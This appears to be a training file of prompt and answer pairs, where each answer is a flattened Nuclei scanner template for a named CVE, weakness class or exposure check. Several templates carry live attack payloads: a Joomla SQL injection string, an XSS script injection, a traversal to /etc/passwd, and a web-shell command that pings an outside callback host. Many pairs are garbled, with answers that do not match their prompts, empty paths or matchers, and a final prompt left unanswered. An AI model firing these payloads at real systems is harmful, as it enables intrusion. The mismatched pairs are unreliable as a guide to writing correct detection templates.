id: rcdevs-webadm-panel info: name: RCDevs WebADM Panel - Detect author: righettod severity: info description: RCDevs WebADM Login Panel was detected. tags: panel,rcdevs,webadm,login,detect,discovery http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/webapps/index.php" - "{{BaseURL}}/websrvs/index.php" - "{{BaseURL}}/admin/login_uid.php" matchers: - type: word words: - "WebADM" - "RCDevs Security" - "www.rcdevs.com" part: body condition: and - type: status status: - 200
generic
info
rcdevs-webadm-panel
Generate a Nuclei template for: Unrestricted PostgreSQL Access
Title: Unrestricted PostgreSQL Access Summary: Unrestricted PostgreSQL Access. Identifies unrestricted inbound access to PostgreSQL databases in Amazon EC2 security groups, which can expose databases to security risks. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: ec2-unrestricted-pgsql info: name: Unrestricted PostgreSQL Access author: princechaddha severity: critical description: Identifies unrestricted inbound access to PostgreSQL databases in Amazon EC2 security groups, which can expose databases to security risks. tags: cloud,devops,aws,amazon,ec2,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
critical
ec2-unrestricted-pgsql
Generate a Nuclei template for CVE-2022-30525
Title: OS Command Injection in zyxel usg_flex_100w_firmware and others Summary: A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. Vulnerability Type: OS Command Injection Severity: critical Affected Products: zyxel usg_flex_100w_firmware, zyxel usg_flex_200_firmware, zyxel usg_flex_500_firmware Indicators: error, vulnerability detected
id: unauth-ztp-ping info: name: Unauthenticated ZyXEL USG ZTP - Detect author: dmartyn severity: high description: Make a ZyXEL USG with ZTP support, pre CVE-2023-28771 patch, do a DNS lookup by asking it to make an ICMP request. This template can be used to detect hosts potentially vulnerable to CVE-2023-28771, CVE-2022-30525, and other issues, without actually exploiting the vulnerability. tags: misconfig,unauth,zyxel,ztp,rce,oast,vuln http: - method: GET path: matchers: - type: word words: - "dns" part: interactsh_protocol - type: word words: - "message" - "result" part: body condition: and - type: status status: - 200
cve
critical
CVE-2022-30525
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: secure-login-panel info: name: Secure Login Service Login Panel - Detect author: dhiyaneshDK severity: info description: Secure Login Service login panel was detected. tags: panel,sls,login,service,discovery http: - method: GET path: - "{{BaseURL}}/login/sls/auth" matchers: - type: status status: - 200 - type: word words: - "<title>Secure Login Service</title>"
cwe
medium
CWE-200
Generate a Nuclei template for: kaspersky phishing Detection
Title: kaspersky phishing Detection Summary: kaspersky phishing Detection. A kaspersky phishing website was detected Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: kaspersky-phish info: name: kaspersky phishing Detection author: rxerium severity: info description: A kaspersky phishing website was detected tags: phishing,kaspersky,osint,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Kaspersky Cyber Security Solutions for Home and Business | Kaspersky" - type: status status: - 200 - type: dsl
generic
info
kaspersky-phish
Generate a Nuclei template for: Currencylayer API Test
Title: Currencylayer API Test Summary: Currencylayer API Test. Exchange rates and currency conversion Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: api-currencylayer info: name: Currencylayer API Test author: daffainfo severity: info description: Exchange rates and currency conversion tags: token-spray,currencylayer http: - method: GET path: - "http://api.currencylayer.com/live?access_key={{token}}" matchers: - type: word words: - ""terms"" - ""source"" - ""quotes"" part: body condition: and
generic
info
api-currencylayer
Generate a Nuclei template for CVE-2015-2196
Title: SQL Injection in web-dorado spider_calendar Summary: SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php. Vulnerability Type: SQL Injection Severity: high Affected Products: web-dorado spider_calendar Indicators: error, vulnerability detected
id: CVE-2015-2196 info: name: WordPress Spider Calendar <=1.4.9 - SQL Injection author: theamanrawat severity: high description: WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
high
CVE-2015-2196
Generate a Nuclei template for: Facebook phishing Detection
Title: Facebook phishing Detection Summary: Facebook phishing Detection. A Facebook phishing website was detected Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: facebook-phish info: name: Facebook phishing Detection author: rxerium severity: info description: A Facebook phishing website was detected tags: phishing,facebook,osint,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Facebook – log in or sign up" - type: status status: - 200 - type: dsl
generic
info
facebook-phish
Generate a Nuclei template for: FacturaScripts Installer Exposure
Title: FacturaScripts Installer Exposure Summary: FacturaScripts Installer Exposure. FacturaScripts is susceptible to the Installation page exposure due to misconfiguration. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: facturascripts-installer info: name: FacturaScripts Installer Exposure author: DhiyaneshDk severity: high description: FacturaScripts is susceptible to the Installation page exposure due to misconfiguration. tags: misconfig,facturascripts,install,exposure,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "FacturaScripts installer" - "connect to the database" part: body condition: and - type: word words: - "text/html" part: header - type: status status: - 200
generic
high
facturascripts-installer
Generate a Nuclei template for CVE-2015-7297
Title: SQL Injection in joomla joomla\! Summary: SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, a different vulnerability than CVE-2015-7858. Vulnerability Type: SQL Injection Severity: high Affected Products: joomla joomla\! Indicators: error, vulnerability detected
id: CVE-2015-7297 info: name: Joomla! Core SQL Injection author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. tags: cve2015,cve,packetstorm,joomla,sqli,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)" matchers: - type: word words: - "{{md5({{num}})}}" part: body
cve
high
CVE-2015-7297
Generate a Nuclei template for: Content-Security-Policy Bypass - Cloudflare CDN
Title: Content-Security-Policy Bypass - Cloudflare CDN Summary: Content-Security-Policy Bypass - Cloudflare CDN. Tags: xss, csp-bypass, cloudflare-cdn Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: cloudflare-cdn-csp-bypass info: name: Content-Security-Policy Bypass - Cloudflare CDN author: renniepak,DhiyaneshDK severity: medium description: Content-Security-Policy Bypass - Cloudflare CDN tags: xss,csp-bypass,cloudflare-cdn,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Content-Security-Policy" - "cloudflare.com" part: header condition: and
generic
medium
cloudflare-cdn-csp-bypass
Generate a Nuclei template for: Tailon Panel - Detect
Title: Tailon Panel - Detect Summary: Tailon Panel - Detect. Tags: panel, tailon, detect Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: tailon-panel info: name: Tailon Panel - Detect author: ritikchaddha severity: info description: Tailon Panel - Detect tags: panel,tailon,detect,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Tailon" - "class="tailon-dark" part: body condition: or - type: status status: - 200
generic
info
tailon-panel
Generate a Nuclei template for: Jeecg-Boot Detect
Title: Jeecg-Boot Detect Summary: Jeecg-Boot Detect. Tags: jeecg-boot, tech, discovery Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: jeecg-boot-detect info: name: Jeecg-Boot Detect author: pikpikcu severity: info description: Jeecg-Boot Detect tags: jeecg-boot,tech,discovery http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/jeecg-boot/" matchers: - type: word words: - "Jeecg-Boot" part: body
generic
info
jeecg-boot-detect
Generate a Nuclei template for CVE-2022-0692
Title: Vulnerability (CWE-601) in alltube_project alltube Summary: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1. Vulnerability Type: Vulnerability (CWE-601) Severity: medium Affected Products: alltube_project alltube Indicators: error, vulnerability detected
id: CVE-2022-0692 info: name: Rudloff alltube prior to 3.0.1 - Open Redirect author: 0x_Akoko severity: medium description: An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1. tags: cve,cve2022,huntr,redirect,rudloff,alltube,alltube_project,vuln http: - method: GET path: - "{{BaseURL}}/index.php/interact.sh" matchers: - type: regex part: header
cve
medium
CVE-2022-0692
Generate a Nuclei template for CVE-2022-42749
Title: Cross-Site Scripting (XSS) in auieo candidats Summary: CandidATS version 3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: auieo candidats Indicators: error, vulnerability detected
id: CVE-2022-42749 info: name: CandidATS 3.0.0 - Cross-Site Scripting author: arafatansari severity: medium description: CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. tags: cve,cve2022,candidats,xss,auieo,vuln http: - method: GET path: - "{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0" matchers: - type: word words: - "<script>alert(document.domain)</script>" - "candidat" part: body condition: and - type: word words: - "text/html" part: header condition: and - type: status status: - 404
cve
medium
CVE-2022-42749
Generate a Nuclei template for CVE-2024-46938
Title: Information Disclosure in sitecore experience_commerce and others Summary: An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files. Vulnerability Type: Information Disclosure Severity: high Affected Products: sitecore experience_commerce, sitecore experience_manager, sitecore experience_platform Indicators: error, vulnerability detected
id: CVE-2024-46938 info: name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read author: DhiyaneshDK severity: high description: An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files. tags: cve,cve2024,sitecore,lfi,rce,vkev,vuln http: - method: GET path: - "{{BaseURL}}/-/media/doo-doo.ashx" matchers: - type: word words: - "/sitecore/service/notfound.aspx" part: location - method: GET path: matchers: - type: word words: - "Could not find a part of the path" part: body - method: GET path: matchers: - type: dsl condition: and
cve
high
CVE-2024-46938
Generate a Nuclei template for: Indegy Sensor Setup - Installer
Title: Indegy Sensor Setup - Installer Summary: Indegy Sensor Setup - Installer. Indegy Sensor is susceptible to the Installation page exposure due to misconfiguration. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: indegy-sensor-installer info: name: Indegy Sensor Setup - Installer author: ritikchaddha severity: high description: Indegy Sensor is susceptible to the Installation page exposure due to misconfiguration. tags: misconfig,indegy,sensor,installer,vuln http: - method: GET path: - "{{BaseURL}}/settings" matchers: - type: word words: - "<title>Setup Wizard</title>" part: body - type: status status: - 200
generic
high
indegy-sensor-installer
Generate a Nuclei template for: Nucleus FTP Service - Detect
Title: Nucleus FTP Service - Detect Summary: Nucleus FTP Service - Detect. Nucleus FTP service was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: nucleus-ftp-detect info: name: Nucleus FTP Service - Detect author: pussycat0x severity: info description: Nucleus FTP service was detected. tags: network,ftp,nucleus,detect,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
nucleus-ftp-detect
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: cyberoam-ssl-vpn-panel info: name: Cyberoam SSL VPN Panel - Detect author: idealphase severity: info description: Cyberoam SSL VPN panel was detected. tags: panel,cyberoam,vpn,sophos,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Cyberoam SSL VPN Portal</title>" - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: Content-Security-Policy Bypass - Meteoprog
Title: Content-Security-Policy Bypass - Meteoprog Summary: Content-Security-Policy Bypass - Meteoprog. Tags: xss, csp-bypass, meteoprog Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: meteoprog-csp-bypass info: name: Content-Security-Policy Bypass - Meteoprog author: renniepak,DhiyaneshDK severity: medium description: Content-Security-Policy Bypass - Meteoprog tags: xss,csp-bypass,meteoprog,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "Content-Security-Policy" - "meteoprog.ua" part: header condition: and
generic
medium
meteoprog-csp-bypass
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: amazon-sns-token info: name: Amazon SNS Token - Detect author: TheBinitGhimire severity: info description: Amazon SNS token was detected. tags: file,keys,token,amazon,aws,sns http: - method: GET path: - "/" matchers: - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template to detect Use of Weak Credentials
Title: Use of Weak Credentials (CWE-1391) Summary: The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker. By design, authentication protocols try to ensure that attackers must perform brute force attacks if they do not know the credentials such as a key or password. However, when these credentials are easily predictable or even fixed (as with default or hard-coded passwords and keys), then the attacker can defeat the mechanism without relying on brute f Vulnerability Type: Use of Weak Credentials Severity: medium Indicators: vulnerability detected, error
id: ruckus-wireless-default-login info: name: Ruckus Wireless - Default Login author: pussycat0x severity: critical description: Ruckus Wireless router contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. tags: default-login,router,ruckus,vuln http: - method: GET path: matchers: - type: word words: - "<title>Ruckus Wireless Admin</title>" - "/status/device.asp" part: body condition: and - type: status status: - 200
cwe
medium
CWE-1391
Generate a Nuclei template for: Unrestricted Access on Uncommon EC2 Ports
Title: Unrestricted Access on Uncommon EC2 Ports Summary: Unrestricted Access on Uncommon EC2 Ports. Ensure Amazon EC2 security groups do not allow unrestricted access (0.0.0.0/0, ::/0) on uncommon ports, protecting against brute force attacks on EC2 instances. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: ec2-sg-ingress info: name: Unrestricted Access on Uncommon EC2 Ports author: princechaddha severity: high description: Ensure Amazon EC2 security groups do not allow unrestricted access (0.0.0.0/0, ::/0) on uncommon ports, protecting against brute force attacks on EC2 instances. tags: cloud,devops,aws,amazon,ec2,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
ec2-sg-ingress
Generate a Nuclei template for: Ruby Configuration File - Detect
Title: Ruby Configuration File - Detect Summary: Ruby Configuration File - Detect. Multiple Ruby configuration files were detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: config-rb info: name: Ruby Configuration File - Detect author: DhiyaneshDK severity: info description: Multiple Ruby configuration files were detected. tags: ruby,devops,exposure,config,vuln http: - method: GET path: - "{{BaseURL}}/config.rb" - "{{BaseURL}}/.chef/config.rb" - "{{BaseURL}}/assets/config.rb" matchers: - type: word words: - "images_dir" - "css_dir" condition: and - type: status status: - 200
generic
info
config-rb
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: pewex info: name: Pewex User Name Information - Detect author: dwisiswant0 severity: info description: Pewex user name information check was conducted. tags: osint,osint-misc,pewex,discovery http: - method: GET path: - "https://retro.pewex.pl/user/{{user}}" matchers: - type: status status: - 200 - type: word words: - "Zamieszcza eksponaty od:" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: WP Rollback – Rollback Plugins and Themes Detection
Title: WP Rollback – Rollback Plugins and Themes Detection Summary: WP Rollback – Rollback Plugins and Themes Detection Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-wp-rollback info: name: WP Rollback – Rollback Plugins and Themes Detection author: ricardomaia severity: info description: WP Rollback – Rollback Plugins and Themes Detection tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-wp-rollback
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: jupyter-notebook info: name: Jupyter Notebook Login Panel - Detect author: hakimkt,arafatansari severity: info description: Jupyter Notebook login panel was detected. tags: edb,panel,jupyter,notebook,exposure,discovery http: - method: GET path: - "{{BaseURL}}/jupyter/login" - "{{BaseURL}}/jupyter/lab" - "{{BaseURL}}/jupyter/hub/lti/launch" - "{{BaseURL}}/hub/login" matchers: - type: word words: - "/jupyter/static/base/images/logo.png" - "/jupyter/hub/logo" - "Select items to perform actions on them." - "JupyterHub" part: body condition: or - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: openvpn-monitor info: name: OpenVPN Monitor - Detect author: geeknik severity: info description: openvpn-monitor was discovered. OpenVPN Monitor is a simple python program to generate html that displays the status of an OpenVPN server, including all its current connections. tags: openvpn,disclosure,panel,discovery http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/openvpn-monitor/" matchers: - type: status status: - 200 - type: word words: - "OpenVPN Status Monitor" - "Username" - "VPN IP" - "Remote IP" part: body condition: and - type: word words: - "text/html" part: header
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2005-0851
Title: Vulnerability (CWE-835) in filezilla-project filezilla_server Summary: FileZilla FTP server before 0.9.6, when using MODE Z (zlib compression), allows remote attackers to cause a denial of service (infinite loop) via certain file uploads or directory listings. Vulnerability Type: Vulnerability (CWE-835) Severity: medium Affected Products: filezilla-project filezilla_server Indicators: error, vulnerability detected
id: CVE-2005-0851 info: name: FileZilla Server < 0.9.6 - DoS via MODE Z Infinite Loop author: pussycat0x severity: medium description: FileZilla Server versions prior to 0.9.6 are vulnerable to denial of service when using MODE Z (zlib compression). Remote attackers can cause an infinite loop via certain file uploads or directory listings, leading to server unresponsiveness. tags: cve,cve2005,network,ftp,filezilla,tcp,passive,vuln http: - method: GET path: - "/" matchers: - type: status status: - 200
cve
medium
CVE-2005-0851
Generate a Nuclei template to detect Command Injection
Title: Command Injection (CWE-77) Summary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac Vulnerability Type: Command Injection Severity: medium Indicators: vulnerability detected, error
id: fastjson-1-2-42-rce info: name: Fastjson 1.2.42 - Remote Code Execution author: zh severity: critical description: Fastjson 1.2.42 is susceptible to a deserialization remote code execution vulnerability tags: fastjson,rce,deserialization,oast,vuln http: - method: GET path: matchers: - type: word words: - "dns" part: interactsh_protocol - type: status status: - 200
cwe
medium
CWE-77
Generate a Nuclei template for: Dionaea SMB Honeypot - Detect
Title: Dionaea SMB Honeypot - Detect Summary: Dionaea SMB Honeypot - Detect. A Dionaea SMB honeypot has been identified. The response to an SMB connection packet differs from real installations, signaling a possible deceptive setup. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: dionaea-smb-honeypot-detect info: name: Dionaea SMB Honeypot - Detect author: UnaPibaGeek severity: info description: A Dionaea SMB honeypot has been identified. The response to an SMB connection packet differs from real installations, signaling a possible deceptive setup. tags: dionaea,smb,honeypot,ir,cti,network,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
dionaea-smb-honeypot-detect
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: parse-dashboard info: name: Parse Dashboard Login Panel - Detect author: tess severity: info description: Parse Dashboard login panel was detected. tags: panel,parse,exposure,parseplatform,discovery http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: word words: - "Parse Dashboard" - "PARSE_DASHBOARD_PATH" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2023-4521
Title: Unknown Vulnerability in mooveagency import_xml_and_rss_feeds Summary: The Import XML and RSS Feeds WordPress plugin before 2.1.5 contains a web shell, allowing unauthenticated attackers to perform RCE. The plugin/vendor was not compromised and the files are the result of running a PoC for a previously reported issue (https://wpscan.com/vulnerability/d4220025-2272-4d5f-9703-4b2ac4a51c42) and not deleting the created files when releasing the new version. Vulnerability Type: Unknown Vulnerability Severity: critical Affected Products: mooveagency import_xml_and_rss_feeds Indicators: error, vulnerability detected
id: CVE-2023-4521 info: name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE author: princechaddha severity: critical description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell. tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency,vuln http: - method: GET path: matchers: - type: word words: - "Import XML and RSS Feeds" - method: GET path: - "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}" matchers: - type: word words: - "dns" part: interactsh_protocol
cve
critical
CVE-2023-4521
Generate a Nuclei template for: Magento Connect Manager Installer - Detect
Title: Magento Connect Manager Installer - Detect Summary: Magento Connect Manager Installer - Detect. Magento Connect Manager installer was detected. The software, available via /downloader/ location, requires Magento admin rights and uses the same authorization methods as for backend. If an attacker locates a matching pair of login/password, the installation will be compromised. An attacker can then discover backend URL for login (even if it is customized as described in Securing Magento /admin/) and install a Filesystem extension to obtain full acces Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: magento-downloader-panel info: name: Magento Connect Manager Installer - Detect author: 5up3r541y4n severity: info description: Magento Connect Manager installer was detected. The software, available via /downloader/ location, requires Magento admin rights and uses the same authorization methods as for backend. If an attacker locates a matching pair of login/password, the installation will be compromised. An attacker can then discover backend URL for login (even if it is customized as described in Securing Magento /admin/) and install a Filesystem extension to obtain full access to all files and finally the database. tags: magento,exposure,panel,discovery http: - method: GET path: - "{{BaseURL}}/downloader/" matchers: - type: word words: - "Magento Downloader" - "Log In" part: body condition: and - type: word words: - "text/html" part: header - type: status status: - 200
generic
info
magento-downloader-panel
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: myanimelist info: name: MyAnimeList User Name Information - Detect author: dwisiswant0 severity: info description: MyAnimeList user name information check was conducted. tags: osint,osint-social,myanimelist,discovery http: - method: GET path: - "https://myanimelist.net/profile/{{user}}" matchers: - type: status status: - 200 - type: word words: - "Profile - MyAnimeList.net" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: Really Simple CAPTCHA Detection
Title: Really Simple CAPTCHA Detection Summary: Really Simple CAPTCHA Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-really-simple-captcha info: name: Really Simple CAPTCHA Detection author: ricardomaia severity: info description: Really Simple CAPTCHA Detection tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-really-simple-captcha
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: imap-detect info: name: IMAP - Detect author: pussycat0x severity: info description: IMAP was detected. tags: network,detect,imap,mail,detection,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2010-1977
Title: Path Traversal in gohigheris com_jwhmcs Summary: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. Vulnerability Type: Path Traversal Severity: high Affected Products: gohigheris com_jwhmcs Indicators: error, vulnerability detected
id: CVE-2010-1977 info: name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. tags: cve2010,cve,edb,joomla,lfi,gohigheris,vuln http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00" matchers: - type: regex - type: status status: - 200
cve
high
CVE-2010-1977
Generate a Nuclei template to detect Open Redirect
Title: Open Redirect (CWE-601) Summary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Vulnerability Type: Open Redirect Severity: high Indicators: vulnerability detected, error
id: icewarp-open-redirect info: name: IceWarp - Open Redirect author: uomogrande severity: medium description: IceWarp open redirect vulnerabilities were detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. tags: icewarp,redirect,vuln http: - method: GET path: - "{{BaseURL}}///interact.sh/%2F.." matchers: - type: word words: - "IceWarp" part: header - type: regex part: header
cwe
high
CWE-601
Generate a Nuclei template for CVE-2025-6934
